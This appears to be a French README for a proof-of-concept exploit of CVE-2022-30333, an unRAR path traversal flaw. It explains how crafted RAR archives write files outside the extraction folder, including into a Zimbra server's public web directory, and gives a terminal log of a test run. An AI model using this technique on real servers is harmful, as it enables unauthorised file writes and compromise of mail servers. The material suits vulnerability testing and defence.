
Exploit de preuve de concept pour CVE-2022-30333, une vulnérabilité de traversée de chemin dans unRAR permettant l'écriture arbitraire de fichiers sur les serveurs Linux et Zimbra via des archives RAR malveillantes.
Fichier exemple pour tester CVE-2022-30333
Sample.rar : si vous voulez tester sous Linux. Lors de l'extraction, il crée trav dans ../../tmp/traversed. Assurez-vous que le répertoire ../../tmp/traversed existe avant d'extraire Sample.rar
exp.rar : si vous voulez tester sur le serveur de messagerie Zimbra. Lors de l'extraction, il crée moo.txt dans /opt/zimbra/jetty_base/webapps/zimbra/public/. Vous pouvez accéder à ce fichier via https://zimbra_mail_domain/public/moo.txt
mkdir ../../tmp/traversed (le dossier de destination doit exister avant unrar)
ls -la ../../tmp/traversed/
total 8
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul 4 02:44 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul 4 02:40 ..
unrar x exp.rar
UNRAR 6.10 beta 1 freeware Copyright (c) 1993-2021 Alexander Roshal
Corrupt header is found
sym - the file header is corrupt
Extracting from exp.rar
Corrupt header is found
sym - the file header is corrupt
Extracting sym OK
Extracting sym/trav OK
Total errors: 4
ls -la ../../tmp/traversed/
total 12
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul 4 02:47 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul 4 02:40 ..
-rw-rw-r-- 1 ubuntu ubuntu 14 Jul 4 02:34 trav
cat ../../tmp/traversed/trav
"traversed"